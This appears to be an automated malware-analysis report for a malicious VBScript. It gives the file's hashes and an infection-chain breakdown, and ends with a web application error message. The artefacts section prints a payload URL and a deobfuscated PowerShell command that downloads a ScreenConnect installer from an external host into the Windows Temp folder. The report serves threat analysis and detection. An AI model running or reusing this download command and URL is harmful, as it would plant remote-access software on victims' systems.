Malicious
Malicious

f6a74036fd2326337f18c424c57c49fb

VBScript
|
MD5: f6a74036fd2326337f18c424c57c49fb
|
Size: 5.03 KB
|
text/vbscript

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
f6a74036fd2326337f18c424c57c49fb
Sha1
b7c915132e72cba30a0cd6a11a5d3948ddec2355
Sha256
542feb5ab4ad77196b837adf10e237947ca01c4a69eac7613f8ebafba2d45908
Sha384
9a83d81f02fed1613d73b8986ac2ffab0b4682f01eb0f5bca23a4515963747c70f7259c01696abb68b98130d7b3a7fc7
Sha512
546c9069e0bde5d82a7eb78c35bdd800f40d432bd79fb55665a51b349d847fb25d58df48a78c65b240febe4efe07e39c8565f506ee01b24ad7b1ed1c3631a802
SSDeep
96:k1lxKOZHy/t2OaJnzOOsXpQZm5ZwdMoIvR5VDVa3gz13liqvgu:SlxfS/8JRJsZQEQMoI53mgzziygu
TLSH
38A17D1E5F23EEA42814828157BA291CFB8813579E805850BA7834D917613719ABF3DF
File Structure
f6a74036fd2326337f18c424c57c49fb
Malicious
f6a74036fd2326337f18c424c57c49fb.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://themaintechnician.us/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
Deobfuscated PowerShell

try { (New-Object "Net.WebClient")."DownloadFile"("https://themaintechnician.us/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest", "C:\Windows\Temp\form.msi") exit 0 } catch { exit 1 }

f6a74036fd2326337f18c424c57c49fb (5.03 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙